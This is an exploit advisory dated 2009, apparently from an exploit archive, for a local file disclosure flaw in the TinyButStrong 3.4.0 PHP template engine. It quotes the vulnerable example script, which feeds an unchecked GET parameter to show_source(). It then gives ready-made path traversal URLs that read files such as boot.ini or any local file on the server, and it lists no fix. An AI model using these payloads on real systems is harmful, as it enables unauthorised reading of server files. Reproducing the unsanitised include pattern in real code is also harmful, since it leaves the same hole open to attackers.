TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability

2009-05-13 17:32:46

( ' )-. ,~'`-.
,~' ` ' ) ) _( _) )
( ( .--.===.--. ( ` ' )
`.%%. .#`. `-'`~~=~'
/%%/ \##\
|%%/ local \##|
|%%| |##|.,-.
\%%| file |##/ )_
\%\ /#/ ( `' )
\%\ include /#/( , -'`-.
,~-. `%\ /#'( ( ') )
( ) )_ `\__|__/' `~-~=--~~='
( ` ') ) [-=-=-]
(_(_.~~~' \|_|/
[***]
\|||/
(o o)
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-
| |
| |

script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady
email: [email protected]
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--=
vul:/examples/tbs_us_examples_0view.php

<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
xpl:

path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini

path/examples/tbs_us_examples_0view.php?script=[local_file]
-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=-
|__|__|
|| ||
OoO OoO

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.